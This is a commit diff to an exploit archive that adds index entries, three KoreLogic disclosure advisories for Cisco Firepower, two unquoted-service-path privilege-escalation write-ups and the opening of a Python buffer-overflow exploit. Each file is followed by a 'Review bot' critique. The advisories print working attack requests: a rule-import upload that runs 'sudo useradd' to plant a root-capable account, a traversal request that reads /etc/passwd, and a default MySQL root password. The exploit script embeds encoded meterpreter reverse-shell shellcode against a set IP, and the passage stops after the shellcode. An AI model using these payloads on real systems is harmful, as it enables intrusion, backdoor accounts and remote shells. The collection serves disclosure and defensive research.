DB: 2016-10-06
10 new exploits: Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials; Bind 9 DNS Server - Denial of Service; ISC BIND 9 - Denial of Service; Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion; Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution; VX Search Enterprise 9.0.26 - Buffer Overflow; Sync Breeze Enterprise 8.9.24 - Buffer Overflow; Dup Scout Enterprise 9.0.28 - Buffer Overflow; Disk Sorter Enterprise 9.0.24 - Buffer Overflow; Disk Savvy Enterprise 9.0.32 - Buffer Overflow; Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation; Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation
This commit is contained in:
parent
77681134f4
commit
5fbed83086
11 changed files with 950 additions and 1 deletions
12
files.csv
12
files.csv
|
@ -3810,6 +3810,7 @@ id,file,description,date,author,platform,type,port
|
|||
4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0
|
||||
4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0
|
||||
4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
|
||||
40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0
|
||||
4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
|
||||
4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0
|
||||
4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
|
||||
|
@ -32999,7 +33000,7 @@ id,file,description,date,author,platform,type,port
|
|||
36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0
|
||||
36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0
|
||||
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
|
||||
40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
|
||||
40453,platforms/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
|
||||
36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
|
||||
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
|
||||
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
|
||||
|
@ -36169,6 +36170,7 @@ id,file,description,date,author,platform,type,port
|
|||
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39870,platforms/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80
|
||||
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
|
||||
40464,platforms/cgi/webapps/40464.txt,"Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion",2016-10-05,KoreLogic,cgi,webapps,0
|
||||
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
|
||||
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
|
||||
|
@ -36179,6 +36181,7 @@ id,file,description,date,author,platform,type,port
|
|||
39879,platforms/php/webapps/39879.txt,"Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
|
||||
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0
|
||||
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
|
||||
40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0
|
||||
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
|
||||
39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80
|
||||
39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
|
||||
|
@ -36572,3 +36575,10 @@ id,file,description,date,author,platform,type,port
|
|||
40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
|
||||
40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
|
||||
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
|
||||
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
|
|
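--- a/platforms/cgi/webapps/40463.txt
+++ b/platforms/cgi/webapps/40463.txt
@@ -0,0 +1,151 @@
+KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command
+Execution Leading to Root Access
+
+Title: Cisco Firepower Threat Management Console Remote Command Execution
+Leading to Root Access
+Advisory ID: KL-001-2016-007
+Publication Date: 2016.10.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt
+
+
+1. Vulnerability Details
+
+Affected Vendor: Cisco
+Affected Product: Firepower Threat Management Console
+Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
+Platform: Embedded Linux
+CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous
+Type, CWE-94: Improper Control of Generation of Code
+Impact: Arbitrary Code Execution
+Attack vector: HTTP
+CVE-ID: CVE-2016-6433
+
+2. Vulnerability Description
+
+An authenticated user can run arbitrary system commands as
+the www user which leads to root.
+
+3. Technical Description
+
+A valid session and CSRF token is required. The webserver runs as
+a non-root user which is permitted to sudo commands as root with
+no password.
+
+POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1
+Host: 1.3.3.7
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
+Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6
+Connection: close
+Content-Type: multipart/form-data;
+boundary=---------------------------15519792567789791301241925798
+Content-Length: 813
+
+-----------------------------15519792567789791301241925798
+Content-Disposition: form-data; name="manual_update"
+
+1
+-----------------------------15519792567789791301241925798
+Content-Disposition: form-data; name="source"
+
+file
+-----------------------------15519792567789791301241925798
+Content-Disposition: form-data; name="file";
+filename="Sourcefire_Rule_Update-2016-03-04-001-vrt.sh"
+Content-Type: application/octet-stream
+
+sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic
+-----------------------------15519792567789791301241925798
+Content-Disposition: form-data; name="action_submit"
+
+Import
+-----------------------------15519792567789791301241925798
+Content-Disposition: form-data; name="sf_action_id"
+
+8c6059ae8dbedc089877b16b7be2ae7f
+-----------------------------15519792567789791301241925798--
+
+
+HTTP/1.1 200 OK
+Date: Sat, 23 Apr 2016 13:38:01 GMT
+Server: Apache
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Content-Length: 49998
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+...
+
+$ ssh korelogic@1.3.3.7
+Password:
+
+Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.
+Cisco is a registered trademark of Cisco Systems, Inc.
+All other trademarks are property of their respective owners.
+
+Cisco Fire Linux OS v6.0.1 (build 37)
+Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)
+
+Could not chdir to home directory /Volume/home/korelogic: No such file or
+directory
+korelogic@firepower:/$ sudo su -
+Password:
+root@firepower:~#
+
+4. Mitigation and Remediation Recommendation
+
+The vendor has acknowledged this vulnerability but has
+not issued a fix. Vendor acknowledgement available at:
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc
+
+5. Credit
+
+This vulnerability was discovered by Matt Bergin (@thatguylevel) of
+KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
+2016.06.30 - Cisco acknowledges receipt of vulnerability report.
+2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
+this vulnerability and for 3 others reported in the
+same product.
+2016.08.12 - 30 business days have elapsed since the vulnerability was
+reported to Cisco.
+2016.09.02 - 45 business days have elapsed since the vulnerability was
+reported to Cisco.
+2016.09.09 - KoreLogic asks for an update on the status of the
+remediation efforts.
+2016.09.15 - Cisco confirms remediation is underway and soon to be
+completed.
+2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
+will be released publicly on 2016.10.05.
+2016.10.05 - Public disclosure.
+
+7. Proof of Concept
+
+See Technical Description
+
+
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt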
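Review bot: The "CWE Classification" line (CWE-434, CWE-94) covers only the upload-to-execution path, while the Technical Description states the www user "is permitted to sudo commands as root with no password"; that passwordless sudo grant is a separate weakness and is the step that turns www-level command execution into root. Listing it on its own line, e.g. `CWE Classification: ..., CWE-250: Execution with Unnecessary Privileges (www user may sudo as root without a password)`, would make clear that a fix to the rule-import upload alone does not close the escalation path. The Mitigation section, which says no vendor fix has been issued, does not say whether the sudoers grant is something an operator can tighten in the meantime; if the authors know, stating it would be the most actionable line in the advisory. For detection, the advisory could note that the multipart POST to `/DetectionPolicy/rules/rulesimport.cgi` with a `manual_update` form field is the access-log shape to review.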
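--- a/platforms/cgi/webapps/40464.txt
+++ b/platforms/cgi/webapps/40464.txt
@@ -0,0 +1,115 @@
+KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion
+
+Title: Cisco Firepower Threat Management Console Local File Inclusion
+Advisory ID: KL-001-2016-006
+Publication Date: 2016.10.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-006.txt
+
+
+1. Vulnerability Details
+
+Affected Vendor: Cisco
+Affected Product: Firepower Threat Management Console
+Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
+Platform: Embedded Linux
+CWE Classification: CWE-73: External Control of File Name or Path
+Impact: Information Disclosure
+Attack vector: HTTP
+CVE-ID: CVE-2016-6435
+
+2. Vulnerability Description
+
+An authenticated user can access arbitrary files on the local system.
+
+3. Technical Description
+
+Requests that take a file path do not properly filter what files can
+be requested. The webserver does not run as root, so files such as
+/etc/shadow are not readable.
+
+GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1
+Host: 1.3.3.7
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
+Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3
+Connection: close
+
+HTTP/1.1 200 OK
+Date: Fri, 22 Apr 2016 23:58:41 GMT
+Server: Apache
+Content-Disposition: attachment; filename=passwd
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: application/octet-stream
+Content-Length: 623
+
+root:x:0:0:Operator:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin
+nobody:x:99:99:nobody:/:/sbin/nologin
+sshd:x:33:33:sshd:/:/sbin/nologin
+www:x:67:67:HTTP server:/var/www:/sbin/nologin
+sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin
+snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin
+sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin
+sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin
+admin:x:100:100::/Volume/home/admin:/bin/sh
+casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash
+
+4. Mitigation and Remediation Recommendation
+
+The vendor has issued a patch for this vulnerability
+in version 6.1. Vendor acknowledgement available at:
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2
+
+5. Credit
+
+This vulnerability was discovered by Matt Bergin (@thatguylevel)
+of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
+2016.06.30 - Cisco acknowledges receipt of vulnerability report.
+2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
+this vulnerability and for 3 others reported in the
+same product.
+2016.08.12 - 30 business days have elapsed since the vulnerability was
+reported to Cisco.
+2016.09.02 - 45 business days have elapsed since the vulnerability was
+reported to Cisco.
+2016.09.09 - KoreLogic asks for an update on the status of the
+remediation efforts.
+2016.09.15 - Cisco confirms remediation is underway and soon to be
+completed.
+2016.09.28 - Cisco informs KoreLogic that the remediation details will
+be released publicly on 2016.10.05.
+2016.10.05 - Public disclosure.
+
+7. Proof of Concept
+
+See Technical Description
+
+
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt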
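Review bot: The Technical Description says only that file-path requests "do not properly filter what files can be requested", but the PoC request ends the `files=` value with `%00`, which suggests the check is defeated by a NUL byte truncating the path rather than by the `../` traversal alone; if that is what the authors observed, naming it (CWE-158 alongside CWE-73) would help anyone writing a regression check against the 6.1 fix. The sentence "files such as /etc/shadow are not readable" describes this bug in isolation; since KL-001-2016-007 in the same commit obtains root from the same www user, a cross-reference in section 4 would keep readers from under-rating the combined exposure. The advisory gives no detection guidance; requests to `/events/reports/view.cgi` whose `files` parameter contains `../` or an encoded NUL are the obvious log indicator and are worth a sentence.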
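--- a/platforms/linux/local/40465.txt
+++ b/platforms/linux/local/40465.txt
@@ -0,0 +1,115 @@
+KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL
+Credentials
+
+Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
+Advisory ID: KL-001-2016-005
+Publication Date: 2016.10.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt
+
+
+1. Vulnerability Details
+
+Affected Vendor: Cisco
+Affected Product: Firepower Threat Management Console
+Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
+Platform: Embedded Linux
+CWE Classification: CWE-798: Use of Hard-coded Credentials
+Impact: Authentication Bypass
+CVE-ID: CVE-2016-6434
+
+2. Vulnerability Description
+
+The root account for the local MySQL database has poor password
+complexity.
+
+
+3. Technical Description
+
+root@firepower:/Volume/6.0.1# mysql -u root --password=admin
+Warning: Using a password on the command line interface can be insecure.
+Welcome to the MySQL monitor. Commands end with ; or \g.
+Your MySQL connection id is 23348
+Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise
+Server - Advanced Edition (Commercial)
+
+Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
+
+Oracle is a registered trademark of Oracle Corporation and/or its
+affiliates. Other names may be trademarks of their respective
+owners.
+
+Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+mysql> show databases;
++--------------------+
+| Database |
++--------------------+
+| information_schema |
+| Sourcefire |
+| external_data |
+| external_schema |
+| mysql |
+| performance_schema |
+| sfsnort |
++--------------------+
+7 rows in set (0.00 sec)
+
+mysql>
+
+Note that mysqld listens only on loopback, so a remote attacker
+would have to leverage some other condition to be able to reach
+the mysql daemon.
+
+4. Mitigation and Remediation Recommendation
+
+The vendor has acknowledged this vulnerability
+but has not released a fix for the
+issue. Vendor acknowledgement available at:
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc1
+
+5. Credit
+
+This vulnerability was discovered by Matt Bergin (@thatguylevel)
+of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
+2016.06.30 - Cisco acknowledges receipt of vulnerability report.
+2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
+this vulnerability and for 3 others reported in the
+same product.
+2016.08.12 - 30 business days have elapsed since the vulnerability was
+reported to Cisco.
+2016.09.02 - 45 business days have elapsed since the vulnerability was
+reported to Cisco.
+2016.09.09 - KoreLogic asks for an update on the status of the
+remediation efforts.
+2016.09.15 - Cisco confirms remediation is underway and soon to be
+completed.
+2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
+will be released publicly on 2016.10.05.
+2016.10.05 - Public disclosure.
+
+7. Proof of Concept
+
+See Technical Description
+
+
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt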
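Review bot: The Vulnerability Details block omits the "Attack vector:" field that the two companion advisories carry, even though the paragraph after the MySQL session says mysqld listens only on loopback, so the vector is local or chained through another flaw; adding `Attack vector: Local` there saves the reader working it out from section 3 and agrees with the files.csv entry, which files this under platforms/linux/local. The Description line "has poor password complexity" also understates what section 3 shows: the account accepts a fixed, guessable value (`admin`), which is a hard-coded credential (the CWE-798 the header already cites) rather than a weak user-chosen one, so `The root account for the local MySQL database uses a fixed default password.` would be more precise. "Impact: Authentication Bypass" sits oddly next to that; "Information Disclosure / Data Tampering" on the listed databases is closer to what a holder of the credential can do.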
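--- a/platforms/windows/local/40460.txt
+++ b/platforms/windows/local/40460.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Abyss Web Server X1 2.11.1 Multiple Local Privilege Escalation
+# Date: 05/10/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Author twitter: @tulpa_security
+# Vendor Homepage: http://aprelium.com/
+# Application Download: http://aprelium.com/abyssws/download.php
+# Version: Software Version 2.11.1
+# Tested on: Windows 7 x86
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+Abyss Web Server installs a service called 'AbyssWebServer' with an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system. Abyss Web Server also suffers from weak file and folder permissions which could allow
+
+an unauthorized user to swop out executable files with their own payload.
+
+2. Proof
+
+C:\Program Files>sc qc AbyssWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AbyssWebServer
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Abyss Web Server\abyssws.exe --service
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : Abyss Web Server
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+
+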
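Review bot: The Description claims Abyss Web Server "also suffers from weak file and folder permissions which could allow an unauthorized user to swop out executable files", but the Proof section shows only `sc qc AbyssWebServer` output, which establishes the unquoted path and the LocalSystem account and says nothing about ACLs; that second claim needs its own evidence (the ACL listing for `C:\Abyss Web Server`) or should be dropped, and the files.csv entry already titles this as an unquoted-service-path issue only. "swop" should read "swap". The `# Date: 05/10/2016` header is ambiguous between May and October, while files.csv records 2016-10-05; an ISO date would remove the ambiguity.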
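--- a/platforms/windows/local/40461.txt
+++ b/platforms/windows/local/40461.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Fortitude HTTP 1.0.4.0 Unquoted Service Path Elevation of Privilege
+# Date: 05/10/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Author twitter: @tulpa_security
+# Vendor Homepage: http://www.networkdls.com/
+# Software Link: http://www.networkdls.com/Software/View/Fortitude_HTTP
+# Version: Software Version 1.0.4.0
+# Tested on: Windows 7 x86
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+Netgear Genie installs a service called 'Fortitude HTTP' with an unquoted service path
+
+running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+2. Proof
+
+C:\Program Files>sc qc "Fortitude HTTP"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Fortitude HTTP
+TYPE : 110 WIN32_OWN_PROCESS (interactive)
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files\NetworkDLS\Fortitude HTTP\Bin
+\FortitudeSvc.exe /RunService
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : NetworkDLS Fortitude HTTP
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+
+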
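Review bot: The Description opens with "Netgear Genie installs a service called 'Fortitude HTTP'", which reads as a leftover from another advisory: the Vendor Homepage, the BINARY_PATH_NAME (`C:\Program Files\NetworkDLS\Fortitude HTTP\Bin\FortitudeSvc.exe`) and the DISPLAY_NAME all identify NetworkDLS Fortitude HTTP. Suggested line: `Fortitude HTTP installs a service called 'Fortitude HTTP' with an unquoted service path`. The `sc qc` output also shows `TYPE : 110 WIN32_OWN_PROCESS (interactive)`, i.e. the service is flagged to interact with the desktop; the advisory does not remark on it, but it is a relevant hardening observation next to the LocalSystem account and deserves a sentence. As with 40460, the `# Date: 05/10/2016` header is ambiguous where files.csv records 2016-10-05.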
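--- a/platforms/windows/remote/40455.py
+++ b/platforms/windows/remote/40455.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "VX Search Enterprise 9.0.26 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Greetings to ozzie_offsec and carbonated
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
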